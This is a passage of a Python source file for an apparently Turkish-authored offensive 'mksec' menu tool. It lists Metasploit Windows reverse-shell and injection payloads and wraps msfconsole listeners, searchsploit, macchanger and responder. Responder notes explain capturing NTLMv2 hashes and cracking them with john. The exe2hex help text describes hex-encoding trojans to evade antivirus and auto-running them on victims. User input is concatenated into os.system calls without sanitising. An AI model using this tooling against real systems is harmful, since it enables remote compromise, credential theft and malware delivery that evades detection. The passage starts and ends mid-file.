PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_rc4_dns Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker with UUID Support\nwindows/pingback_bind_tcp Open a socket and report UUID when a connection is received (Windows x86)\nwindows/pingback_reverse_tcp Connect back to attacker and report UUID (Windows x86)\nwindows/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session\nwindows/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session\nwindows/shell/bind_hidden_ipknock_tcp Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method(you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/shell/bind_hidden_tcp Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/shell/bind_ipv6_tcp Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)\nwindows/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/shell/bind_named_pipe Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)\nwindows/shell/bind_nonx_tcp Spawn a piped command shell (staged). Listen for a connection (No NX)\nwindows/shell/bind_tcp Spawn a piped command shell (staged). Listen for a connection (Windows x86)\nwindows/shell/bind_tcp_rc4 Spawn a piped command shell (staged). Listen for a connection\nwindows/shell/bind_tcp_uuid Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/shell/find_tag Spawn a piped command shell (staged). Use an established connection\nwindows/shell/reverse_ipv6_tcp Spawn a piped command shell (staged). Connect back to the attacker over IPv6\nwindows/shell/reverse_nonx_tcp Spawn a piped command shell (staged). Connect back to the attacker (No NX)\nwindows/shell/reverse_ord_tcp Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_allports Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/shell/reverse_tcp_dns Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_rc4 Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_rc4_dns Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_uuid Spawn a piped command shell (staged). Connect back to the attacker with UUID Support\nwindows/shell/reverse_udp Spawn a piped command shell (staged). Connect back to the attacker with UUID Support\nwindows/shell_bind_tcp Listen for a connection and spawn a command shell\nwindows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell\nwindows/shell_hidden_bind_tcp Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.\nwindows/shell_reverse_tcp Connect back to attacker and spawn a command shell\nwindows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API\nwindows/upexec/bind_hidden_ipknock_tcp Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/upexec/bind_hidden_tcp Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/upexec/bind_ipv6_tcp Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)\nwindows/upexec/bind_ipv6_tcp_uuid Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/upexec/bind_named_pipe Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)\nwindows/upexec/bind_nonx_tcp Uploads an executable and runs it (staged). Listen for a connection (No NX)\nwindows/upexec/bind_tcp Uploads an executable and runs it (staged). Listen for a connection (Windows x86)\nwindows/upexec/bind_tcp_rc4 Uploads an executable and runs it (staged). Listen for a connection\nwindows/upexec/bind_tcp_uuid Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/upexec/find_tag Uploads an executable and runs it (staged). Use an established connection\nwindows/upexec/reverse_ipv6_tcp Uploads an executable and runs it (staged). Connect back to the attacker over IPv6\nwindows/upexec/reverse_nonx_tcp Uploads an executable and runs it (staged). Connect back to the attacker (No NX)\nwindows/upexec/reverse_ord_tcp Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_allports Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/upexec/reverse_tcp_dns Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_rc4 Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_rc4_dns Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_uuid Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support\nwindows/upexec/reverse_udp Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support\nwindows/vncinject/bind_hidden_ipknock_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/vncinject/bind_hidden_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection (Windows x86)\nwindows/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/vncinject/bind_named_pipe Inject a VNC Dll via a reflective loader (staged). Listen for a pipe connection (Windows x86)\nwindows/vncinject/bind_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)\nwindows/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)\nwindows/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Listen for a connection\nwindows/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/vncinject/find_tag Inject a VNC Dll via a reflective loader (staged). Use an established connection\nwindows/vncinject/reverse_hop_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.\nwindows/vncinject/reverse_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)\nwindows/vncinject/reverse_http_proxy_pstore Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP\nwindows/vncinject/reverse_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6\nwindows/vncinject/reverse_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)\nwindows/vncinject/reverse_ord_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_allports Inject a VNC Dll via a reflective loader (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/vncinject/reverse_tcp_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_rc4_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support\nwindows/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)\nwindows/x64/exec Execute an arbitrary command (Windows x64)\nwindows/x64/loadlibrary Load an arbitrary x64 library path\nwindows/x64/messagebox Spawn a dialog via MessageBox using a customizable title, text & icon\nwindows/x64/meterpreter/bind_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x64)\nwindows/x64/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/meterpreter/bind_named_pipe Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x64)\nwindows/x64/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x64)\nwindows/x64/meterpreter/bind_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/x64/meterpreter/bind_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x64)\nwindows/x64/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/meterpreter/reverse_https Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/meterpreter/reverse_named_pipe Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot\nwindows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (Windows x64)\nwindows/x64/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/x64/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/meterpreter/reverse_winhttp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 winhttp)\nwindows/x64/meterpreter/reverse_winhttps Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows x64 winhttp)\nwindows/x64/meterpreter_bind_named_pipe Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/x64/peinject/bind_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for an IPv6 connection (Windows x64)\nwindows/x64/peinject/bind_ipv6_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/peinject/bind_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a pipe connection (Windows x64)\nwindows/x64/peinject/bind_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a connection(Windows x64)\nwindows/x64/peinject/bind_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker\nwindows/x64/peinject/bind_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Listen for a connectionwith UUID Support (Windows x64)\nwindows/x64/peinject/reverse_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker via a named pipe pivot\nwindows/x64/peinject/reverse_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker (Windows x64)\nwindows/x64/peinject/reverse_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker\nwindows/x64/peinject/reverse_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Windows x64)\nwindows/x64/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session\nwindows/x64/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session\nwindows/x64/shell/bind_ipv6_tcp Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)\nwindows/x64/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/shell/bind_named_pipe Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)\nwindows/x64/shell/bind_tcp Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)\nwindows/x64/shell/bind_tcp_rc4 Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\nwindows/x64/shell/bind_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)\nwindows/x64/shell/reverse_tcp Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)\nwindows/x64/shell/reverse_tcp_rc4 Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\nwindows/x64/shell/reverse_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)\nwindows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)\nwindows/x64/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)\nwindows/x64/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/vncinject/bind_named_pipe Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a pipe connection (Windows x64)\nwindows/x64/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)\nwindows/x64/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker\nwindows/x64/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)\nwindows/x64/vncinject/reverse_http Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/vncinject/reverse_https Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)\nwindows/x64/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker\nwindows/x64/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)\nwindows/x64/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)\nwindows/x64/vncinject/reverse_winhttps Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)\n""")
elif "run" == uinput.lower():
print("Please wait...")
os.system("sudo msfconsole -q -x 'use exploit/multi/handler; set payload " + payload.strip() + "; set lhost " + host.strip() + "; set lport "+ port.strip() + "; exploit'")
elif "run -f" == uinput.lower():
print("Please wait...")
os.system("cd /opt/metasploit-framework/ && sudo ./msfconsole -q -x 'use exploit/multi/handler; set payload " + payload.strip() + "; set lhost " + host.strip() + "; set lport "+ port.strip() + "; exploit'")
create = " FALSE "
listener = " FALSE "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[payload_creater_and_listener]\033[37m\x1b[0m ")
UserInputs(uinput+"exp")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mPayload Creator and Listener is a payload creation and listening tool. This tool uses the Msfvenom and Msfconsole tools. Edited by mksec using the 'exploit/multi/handler' module in the Metasploit tool. \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mPayload Creator and Listener, bir payload oluşturma ve dinleme aracıdır. Bu araç, Msfvenom ve Msfconsole araçlarını kullanır. Metasploit aracı içerisindeki 'exploit/multi/handler' modülünü kullanarak mksec tarafından düzenlenmiştir.\x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nCREATE PAYLOAD {} OPT Set this value to 'TRUE' to create a payload. \x1b[32mDefault value = FALSE\x1b[37m\nPAYLOAD LISTENER {} OPT Set this value to 'TRUE' to listen for a payload. \x1b[32mDefault value = FALSE\x1b[37m".format(create,listener))
elif "set create payload" in uinput.lower():
create = uinput
create = create.replace("set create payload ","").replace("set CREATE PAYLOAD ","").replace("SET create payload ","").replace("SET CREATE PAYLOAD ","").center(25).upper()
elif "set payload listener" in uinput.lower():
listener = uinput
listener = listener.replace("set payload listener ","").replace("set PAYLOAD LISTENER ","").replace("SET payload listener ","").replace("SET PAYLOAD LISTENER ","").center(25).upper()
elif "run" == uinput.lower():
if create.lower().strip() == "true" and listener.lower().strip() == "false":
PayloadCreater()
elif listener.lower().strip() == "true" and create.lower().strip() == "false":
PayloadListener()
elif create.lower().strip() == "true" and listener.lower().strip() == "true":
print('\x1b[1m\x1b[31mYou cannot choose both.')
else:
print("\x1b[1m\x1b[31mYou have not selected one yet\x1b[1m")
def searchsploit():
search = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[searchsploit]\033[37m\x1b[0m ")
UserInputs(uinput+"exp")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mSearchsploit easily presents exploits found on the system by ExploitDB to us via terminal.\n\x1b[33mTR:\x1b[37mSearchsploit, ExploitDB tarafından sistemde bulunan exploitleri bize kolayca terminal üzerinden sunar. ")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nSEARCH{} YES Type the exploit you want to search \x1b[32mex: ftp\x1b[37m".format(search))
elif "set search" in uinput.lower():
search = uinput
search = search.replace("set search ","").replace("set SEARCH ","").replace("SET search ","").replace("SET SEARCH ","").center(25)
elif "run" == uinput.lower():
os.system("searchsploit " + search.strip())
def macchanger():
iface = " "
manual = " "
youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
os.popen('ip addr show {}'.format(youriface)).read().split("inet ")[1].split("/")[0]
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[macchanger]\033[37m\x1b[0m ")
UserInputs(uinput+"sniff")
if uinput.lower() == "info":
print("\x1b[1m\x1b[37m\x1b[35mMacchanger\x1b[37m, it is used to change the MAC address.\n\n\x1b[33mUsage:\x1b[37m\n\x1b[33m======\x1b[37m\nIf you want to randomly change your MAC address just fill in 'IFACE' and type \x1b[32m'run --random' or 'run -r'\x1b[37m.\nIf you want to change your MAC address manually, fill in 'IFACE' and 'MANUAL' and type \x1b[32m'run --manual' or 'run -m'\x1b[37m.\nIf you want to revert to your default MAC address just fill in 'IFACE' and type \x1b[32m'run --default' or 'run -d'\x1b[37m.\n\n\n\x1b[35mMacchanger\x1b[37m, MAC adresini değiştirmek için kullanılır.\n\n\x1b[33mKullanım:\x1b[37m\n\x1b[33m=========\x1b[37m\nRandom olarak MAC adresinizi değiştirmek istiyorsanız sadece 'IFACE' kısmını doldurun ve \x1b[32m'run --random' or 'run -r'\x1b[37m yazın.\nManuel olarak MAC adresinizi değiştirmek istiyorsanız 'IFACE' ve 'MANUAL' kısımlarını doldurun ve \x1b[32m'run --manual' or 'run -m'\x1b[37m yazın.\nDefault MAC adresinize geri dönmek istiyorsanız sadece 'IFACE' kısmını doldurun ve \x1b[32m'run --default' or 'run -d'\x1b[37m yazın.\n")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIFACE {} YES Your interface =\x1b[32m{}\x1b[37m\nMANUAL{} OPT Manual MAC address \x1b[32mex: 11:22:33:33:22:11\x1b[37m".format(iface,youriface,manual))
elif "set iface" in uinput.lower():
iface = uinput
iface = iface.replace("set iface ","").replace("set IFACE ","").replace("SET iface ","").replace("SET IFACE ","").center(25)
elif "set manual" in uinput.lower():
manual = uinput
manual = manual.replace("set manual ","").replace("set MANUAL ","").replace("SET manual ","").replace("SET MANUAL ","").center(25)
elif "run" == uinput.lower():
print("\x1b[1m\x1b[31mCommand not found. You can check the run command by typing 'info'\x1b[1m")
elif "run --random" == uinput.lower() or "run -r" == uinput.lower():
os.system("sudo macchanger -r " + iface.strip())
elif "run --manual" == uinput.lower() or "run -m" == uinput.lower():
os.system("sudo macchanger --mac " + manual.strip() + " " + iface.strip())
elif "run --default" == uinput.lower() or "run -d" == uinput.lower():
os.system("sudo macchanger -p " + iface.strip())
def responder():
os.system("""echo \x1b[1m'
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
| responder |
| |
| ag uzerindeki cihazlarin netbios undan gelen istekleri izler ve takip eder |
| |
| ag uzerindeki cihaz, |
| dosya paylasiminda ya da sitelerde sifre girdiyse bunlarin log kaydini hashli sekilde tutar |
| aracin log kayitlari /usr/share/responder/logs/ icerisinde tutulur |
| ex: /usr/share/responder/logs/HTTP-NTLMv2-192.168.10.8.txt |
| |
| hashli verileri nasil kirabilirsiniz? |
| john /usr/share/responder/logs/HTTP-NTLMv2-192.168.10.8.txt |
| |
| back go back |
|-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-|'
""")
os.system("echo '\n'")
os.system("ifconfig")
os.system("echo 'ex: eth0'")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
if uinput == "back":
os.system("clear")
sniffingSpoofing()
else:
os.system("""echo '
agdaki cihazlari izleme isleminiz bittiginde ctrl+c ile islemi istediginiz zaman sonlandirin
devam ederseniz, agdaki cihazlari sonsuza kadar takip edecektir ve log kayitlari tutacaktir'""")
os.system("echo ' simdi baslamak icin ctrl + c yapiniz ' -a -d backback9")
os.system("responder -I " + uinput)
def exe2hex():
userexe = " "
userpayload = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[exe2hex]\033[37m\x1b[0m ")
UserInputs(uinput+"post")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mExe2hex is a tool that converts exe files to hexadecimal codes. (Not only the .exe extension, it also works for .py files or any file extension.)\n\x1b[35mWhat does it do?\x1b[37m\nUsually, trojans are caught by firewalls or antivirus programs.\nIf we convert the trojan to hexadecimal codes, firewalls and antivirus programs may not understand hexadecimal codes.\nFor this reason, it is difficult to detect.\nIn some cases it can never be detected.\n\x1b[35mThe situation to be considered after using the exe2hex tool!\x1b[37m\nType 'start file_name.exe' in the last line of the created .cmd file.\n\x1b[35mWhat happens if you don't?\x1b[37m\nThe exe extension will not run automatically.\nUser has to open file_name.exe manually and we don't like that (:\nIf the \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mExe2hex, exe dosyalarını hexadecimal kodlarına çeviren bir araçtır. (Sadece .exe uzantısı değil, .py uzantılı dosyalar ya da herhangi bir dosya uzantısında da işe yarar.)\n\x1b[35mNe işe yarar?\x1b[37m\nGenellikle trojanlar güvenlik duvarlarına ya da antivirüs programlarına yakalanır.\nEğer trojanı hexadecimal kodlarına çevirirsek güvenlik duvarları ve antivirüs programları hexadecimal kodlarını anlamayabilir.\nBu nedenden dolayı tespit etmekte zorlanır.\nBazı durumlarda asla tespit edilemez.\n\x1b[35mExe2hex aracı kullanıldıktan sonra dikkat edilmesi gereken durum!\x1b[37m\nolusturulan .cmd uzantılı dosyanın son satırına 'start dosya_adı.exe' yazınız.\n\x1b[35mEğer bunu yapmazsanız ne olur?\x1b[37m\nExe uzantısı otomatik olarak çalıştırılmayacaktır.\nKullanıcı manuel olarak dosya_adı.exe dosyasını açması gerekir ve biz bunu sevmeyiz (:\n\x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run 